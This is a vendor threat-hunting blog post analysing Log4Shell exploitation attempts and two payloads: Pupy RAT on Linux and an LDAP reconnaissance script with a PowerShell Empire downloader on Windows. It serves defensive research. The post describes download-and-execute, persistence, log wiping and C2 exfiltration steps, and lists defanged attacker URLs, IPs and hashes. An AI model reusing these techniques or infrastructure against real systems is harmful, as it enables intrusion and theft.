* [Blog](https://www.paloaltonetworks.com.au/blog) * [Security Operations](https://www.paloaltonetworks.com.au/blog/security-operations/) * [Must-Read Articles](https://www.paloaltonetworks.com.au/blog/security-operations/category/must-read-articles/) * Shining a Light on Log4j ... # Shining a Light on Log4j Exploit Payloads [](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.paloaltonetworks.com.au%2Fblog%2Fsecurity-operations%2Fshining-a-light-on-log4j-exploit-payloads%2F) [](https://twitter.com/share?text=Shining+a+Light+on+Log4j+Exploit+Payloads&url=https%3A%2F%2Fwww.paloaltonetworks.com.au%2Fblog%2Fsecurity-operations%2Fshining-a-light-on-log4j-exploit-payloads%2F) [](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fwww.paloaltonetworks.com.au%2Fblog%2Fsecurity-operations%2Fshining-a-light-on-log4j-exploit-payloads%2F&title=Shining+a+Light+on+Log4j+Exploit+Payloads&summary=&source=) [](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://www.paloaltonetworks.com.au/blog/security-operations/shining-a-light-on-log4j-exploit-payloads/&ts=markdown) \[\](mailto:?subject=Shining a Light on Log4j Exploit Payloads) Link copied By [Oded Awaskar](https://www.paloaltonetworks.com/blog/author/oded-awaskar/?ts=markdown "Posts by Oded Awaskar"), [Itay Gamliel](https://www.paloaltonetworks.com/blog/author/itay-gamliel/?ts=markdown "Posts by Itay Gamliel"), [Veronika Senderovych](https://www.paloaltonetworks.com/blog/author/veronika-senderovych/?ts=markdown "Posts by Veronika Senderovych") and [Daniela Shalev](https://www.paloaltonetworks.com/blog/author/daniela-shalev/?ts=markdown "Posts by Daniela Shalev") Dec 22, 2021 7 minutes [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown) [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [Apache Log4J](https://www.paloaltonetworks.com/blog/tag/apache-log4j/?ts=markdown) [Cortex](https://www.paloaltonetworks.com/blog/tag/cortex/?ts=markdown) [Cortex XDR](https://www.paloaltonetworks.com/blog/tag/cortex-xdr/?ts=markdown) [Cortex XDR Managed Threat Hunting](https://www.paloaltonetworks.com/blog/tag/cortex-xdr-managed-threat-hunting/?ts=markdown) [exploit](https://www.paloaltonetworks.com/blog/tag/exploit/?ts=markdown) [Log4J Vulnerability](https://www.paloaltonetworks.com/blog/tag/log4j-vulnerability/?ts=markdown) [Threat Hunting](https://www.paloaltonetworks.com/blog/tag/threat-hunting/?ts=markdown) Over the past 10 days, the Cortex XDR Managed Threat Hunting team observed a significant number of attempts to exploit the Log4Shell vulnerability. We've been especially interested in the sophistication of a certain set of exploit attempts and dropped payloads, which we will describe below. In this post, we will deep-dive into a few examples of payloads collected and analyzed by the [Cortex XDR Managed Threat Hunting](https://www.paloaltonetworks.com/cortex/managed-threat-hunting) experts. Not only were these payloads spotted on a very few exploitation attempts, but they are also not your everyday fire-and-forget type of payloads like cryptocurrency-miners and botnets. Among the payloads found are: * [Pupy RAT](https://attack.mitre.org/software/S0192/) * LDAP Scanner and [PowerShell Empire](https://attack.mitre.org/software/S0363/) Dropper ## Attack Trends in the Wild As can be seen on the below graph, the Managed Threat Hunting team spotted a large amount of attacks following the day of the vulnerability disclosure, observed over both the Cortex XDR and Next-Generation Firewall datasets per day for the past 10 days. :chart: *Figure 1. Log4Shell exploitation attempts trend graph over the past 10 days.* When breaking down the events to their origin country, we noticed that most of the attacks originated from the United States, Germany and Russia. With that being said, we recognize that the attackers might leverage proxy servers and VPNs located in those countries to hide their actual physical locations. ![Figure 2. World heatmap of source IP addresses.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-112.png) *Figure 2. World heatmap of source IP addresses.* The Managed Threat Hunting team worked to find the needles in the haystack, hunting for interesting payloads spotted in the wild. The Managed Threat Hunting team has downloaded each malicious resource that was spotted inside the malicious User-Agent requests and carefully attributed each one of them to a specific malware family. While most of the payloads are considered to be pretty standard and were attributed to botnets/cryptocurrency miners, listed below are a couple of interesting payloads which stood out among the rest. ## Attack Vector Overview We encountered 51,500 exploitation attempts, broken into 442 unique, malicious User-Agent strings. When we tried to access the malicious servers included in the User-Agent strings, 98% of them were already down. However, we were able to successfully download 11 attack payloads. ## Payloads in the Wild While observing adversaries' attempts to exploit this vulnerability in our customers' environments, we mostly encountered cryptominers and infamous botnets like [Mirai](https://unit42.paloaltonetworks.com/tag/mirai/) and Hakai. When investigating some of the payloads, the Cortex Managed Threat Hunting team discovered a couple that stood out when compared to others due to the rarity of their appearances in our User-Agent collection. In this section,we will explore two different observed payloads: 1. Pupy RAT - Linux 2. LDAP Scanner and PowerShell Empire Dropper - Windows ### Payload No. 1 -- Pupy RAT **Pupy RAT**is an open-source, cross-platform, multi-function remote access trojan (RAT) and post-exploitation tool written mainly in Python. One of the malicious User-Agent strings that caught our eye was **![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-113.png)** Unlike most of the User-Agents observed, the attackers included the remote server address after a legitimate User-Agent, in an attempt to hide the malicious reference and possibly evade detection. While making a request to ![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-114.png) we were able to retrieve a compiled Java class that contained an encoded base64 command: **![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-115.png)** **![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-116.png)** *Figure 3. Decompiled Java class.* After decoding the above-mentioned string, we identified a **wget**command attempting to download a file from a remote server and then execute it: ![Figure 4. Decoding Base64 with CyberChef.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-117.png) *Figure 4. Decoding Base64 with CyberChef.* When making a request to the above-mentioned remote server, we were able to retrieve the following bash script: ![Figure 5. Malicious bash script.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-118.png) *Figure 5. Malicious bash script.* The main purpose of the malicious bash script is to: 1. Maintain persistence by changing attributes of relevant files, verifying future needed directories and implementing other persistence mechanisms depending on kernel version and execution permissions. 2. Download an ELF executable from: **http://api\[.\]api-alipay\[.\]com/kworkerqxnz** and save it to the file system **/lib/ntpd** or **/var/tmp/krowker**, again depending on the execution permissions\*\*.\*\* 3. Run the executable and clean all of the relevant logs. The malware (kworker process) communicates with host 92\[.\]118\[.\]189\[.\]140 on port 443. **![Figure 6. Example of a malicious executable’s causality chain in Cortex XDR deployed with a detect-only profile.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-119.png)** *Figure 6. Example of a malicious executable's causality chain in Cortex XDR deployed with a detect-only profile.* After examining the above payload, we attributed it to Pupy RAT: **![Figure 7. IDA function view of Pupy RAT.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-120.png)** *Figure 7. IDA function view of Pupy RAT.* ### Payload No. 2 -- LDAP Scanner and PowerShell Empire Downloader PowerShell Empire is a PowerShell based post-exploitation infrastructure. It has the ability to run multiple payloads on the infected host, such as keyloggers or Mimikatz and also has features a handful of capabilities to perform lateral movement. An LDAP scan is a process of gathering information about all of the entities connected to a domain. That way, attackers can determine whether a domain has potentially interesting hosts before deploying more sophisticated payloads. As most of the Log4j instances are part of software installed on Linux based servers, many of the payloads we analyzed are targeting Linux. However, we also observed a payload targeting Windows OS. In this example, we downloaded a compiled Java Class originating from the User-Agent: **![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-121.png)** ![Figure 8. Decompiled Java class.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-122.png) *Figure 8. Decompiled Java class.* Upon execution, the script will attempt to identify the machine's operating system. If the targeted host is running any Windows-based OS, the malware initiates a PowerShell instance and executes an LDAP query in order to get a list of domain computers that logged in over the past 100 days. The final stage will be sending the collected data to the C2 server: **http://45.146\[.\]164.160:8085/r?os=** ![Figure 9. PowerShell LDAP reconnaissance.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-123.png) *Figure 9. PowerShell LDAP reconnaissance.* Although this sample may seem to be not too sophisticated, as it only performs Active Directory reconnaissance, this is a quite smart technique utilized by the threat actor to first identify appropriate victims and only then deliver the actual payload. While pivoting on top of the suspected C2 server (**45.146\[.\]164.160**) we were able to identify a PHP page communicating with two suspicious PowerShell scripts (ps.ps1 and 1.ps1). These scripts are Base64-encoded one-liners, and are used to download PowerShell Empire stagers. ![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-124.png) Figure 10. Suspicious Base64 encoded PowerShell one-liners in the files ![Figure 11. Encoded PowerShell command downloading PowerShell Empire.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-125.png) *Figure 11. Encoded PowerShell command downloading PowerShell Empire.* ## Closing Notes High severity Remote Code Execution CVEs are turning to be part of the Infosec community monthly routine; it is no longer considered rare and "exciting" when a CVE with a \>9 CVSS score is published. This may translate into indifference and a minor sense of urgency when pursuing the vulnerability patching. We as a community must remember that threat actors will take advantage of these vulnerabilities as soon as the public POC is available. While these threat actors are mostly focusing on deploying "low-risk" malware, like Cryptominers and Botnets -- our goal with this research is to emphasize that these vulnerabilities can also be utilized to deploy more sophisticated malware. A more sophisticated malware usually suggests a competent threat actor behind it, one that is willing to invest some proper time in reconnaissance and lateral movement before taking actions on objectives. It is recommended that you follow the mitigations described in the "[Conclusion](https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/#conclusion)" section of the Palo Alto Networks [Unit 42 analysis of the Apache log4j vulnerability](https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/), and immediately patch any potentially affected host. You may also refer to our previously published blog post about [hunting for the Log4j assets and exploitation attempts in your cloud and on-premises environments](https://www.paloaltonetworks.com/blog/security-operations/hunting-for-log4j-cve-2021-44228-log4shell-exploit-activity/). We wish you happy hunting and safe, happy holidays! ## Indicators of Compromise (IoCs) List | **Payload** | **Description** | **IoC** | | Pupy RAT | Pupy ELF SHA256 | 1506198201ed338520b98955a93e5df4f978ee550d51c19c1a7aed03e7d5fd91 | | Pupy RAT | 1st Stage bash script Download | http://92.118.189\[.\]197/kswapdqxnz | | Pupy RAT | Java Compiled Class Download | ldap://92\[.\]118\[.\]189\[.\]140:1389/kj9hgj | | Pupy RAT | Pupy RAT Download | http://api.api-alipay\[.\]com/kworkerqxnz | | LDAP Scanner | C2 Server | 45\[.\]146.164.16:8085 | | LDAP Scanner | Java Compiled Class Download | 45\[.\]146.164.160:1389/t | | LDAP Scanner | Java Compiled Class Sha256 | d4eefe1f6b79c03f1f0e99ad665467e446db3474874972d511eebfd57822bf44 | |--------------|---------------------------------------|------------------------------------------------------------------| *** ** * ** *** ## Related Blogs ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [#### How Cortex XDR Blocks Log4Shell Exploits with Java Deserialization Exploit Protection](https://www.paloaltonetworks.com.au/blog/security-operations/how-cortex-xdr-blocks-log4shell-exploits-with-java-deserialization-exploit-protection/) ### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown), [Unit 42](https://www.paloaltonetworks.com/blog/category/unit42/?ts=markdown), [Web Security](https://www.paloaltonetworks.com/blog/category/web-security/?ts=markdown) [#### Unit 42 Strikes Oil in MITRE Engenuity Managed Services Evaluation](https://www.paloaltonetworks.com.au/blog/2022/11/unit-42-mitre-managedservices-2022/) ### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown) [#### Forrester Names Palo Alto Networks a Leader in XDR](https://www.paloaltonetworks.com.au/blog/2024/06/forrester-names-palo-alto-networks-a-leader-in-xdr/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [#### Prevention, Hunting and Playbooks for MSDT Zero-Day (CVE-2022-30190)](https://www.paloaltonetworks.com.au/blog/security-operations/prevention-hunting-and-playbooks-for-msdt-zero-day-cve-2022-30190/) ### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown) [#### On Fire! CRN Names PAN One of the 10 Hottest XDR Security Companies](https://www.paloaltonetworks.com.au/blog/2022/02/one-of-the-10-hottest-xdr-security-companies/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Uncategorized](https://www.paloaltonetworks.com/blog/category/uncategorized/?ts=markdown) [#### Detecting the Kerberos noPac Vulnerabilities with Cortex XDR™](https://www.paloaltonetworks.com.au/blog/security-operations/detecting-the-kerberos-nopac-vulnerabilities-with-cortex-xdr/) ### Subscribe to Security Operations Blogs! Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more. ![spinner](https://www.paloaltonetworks.com.au/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up Please enter a valid email. By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder. This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply. {#footer} {#footer} ## Products and Services * [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown) * [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown) * [Prisma AIRS](https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security?ts=markdown) * [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security?ts=markdown) * [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions?ts=markdown) * [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention?ts=markdown) * [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering?ts=markdown) * [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire?ts=markdown) * [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security?ts=markdown) * [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown) * [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security?ts=markdown) * [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown) * [Industrial OT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown) * [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown) * [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown) * [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations?ts=markdown) * [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls?ts=markdown) * [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager?ts=markdown) * [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription?ts=markdown) * [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os?ts=markdown) * [Panorama](https://www.paloaltonetworks.com/network-security/panorama?ts=markdown) * [Secure Access Service Edge](https://www.paloaltonetworks.com/sase?ts=markdown) * [Prisma SASE](https://www.paloaltonetworks.com/sase?ts=markdown) * [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration?ts=markdown) * [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem?ts=markdown) * [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown) * [Prisma Access](https://www.paloaltonetworks.com/sase/access?ts=markdown) * [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser?ts=markdown) * [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan?ts=markdown) * [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation?ts=markdown) * [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown) * [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex?ts=markdown) * [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown) * [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown) * [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security?ts=markdown) * [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security?ts=markdown) * [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security?ts=markdown) * [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud?ts=markdown) * [AI-Driven SOC](https://www.paloaltonetworks.com/cortex?ts=markdown) * [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam?ts=markdown) * [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?ts=markdown) * [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar?ts=markdown) * [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse?ts=markdown) * [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response?ts=markdown) * [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam?ts=markdown) * [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42?ts=markdown) * [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess?ts=markdown) * [Incident Response](https://www.paloaltonetworks.com/unit42/respond?ts=markdown) * [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform?ts=markdown) * [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners?ts=markdown) ## Company * [About Us](https://www.paloaltonetworks.com/about-us?ts=markdown) * [Careers](https://jobs.paloaltonetworks.com/en/) * [Contact Us](https://www.paloaltonetworks.com/company/contact-sales?ts=markdown) * [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility?ts=markdown) * [Customers](https://www.paloaltonetworks.com/customers?ts=markdown) * [Investor Relations](https://investors.paloaltonetworks.com/) * [Location](https://www.paloaltonetworks.com/about-us/locations?ts=markdown) * [Newsroom](https://www.paloaltonetworks.com/company/newsroom?ts=markdown) ## Popular Links * [Blog](https://www.paloaltonetworks.com/blog/?ts=markdown) * [Communities](https://www.paloaltonetworks.com/communities?ts=markdown) * [Content Library](https://www.paloaltonetworks.com/resources?ts=markdown) * [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia?ts=markdown) * [Event Center](https://events.paloaltonetworks.com/) * [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center) * [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z?ts=markdown) * [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance?ts=markdown) * [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure?ts=markdown) * [Sitemap](https://www.paloaltonetworks.com/sitemap?ts=markdown) * [Tech Docs](https://docs.paloaltonetworks.com/) * [Unit 42](https://unit42.paloaltonetworks.com/) * [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd) ![PAN logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg) * [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown) * [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center?ts=markdown) * [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) * [Documents](https://www.paloaltonetworks.com/legal?ts=markdown) Copyright © 2026 Palo Alto Networks. All Rights Reserved * [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks) * [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector?ts=markdown) * [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/) * [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks) * [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks) * EN Select your language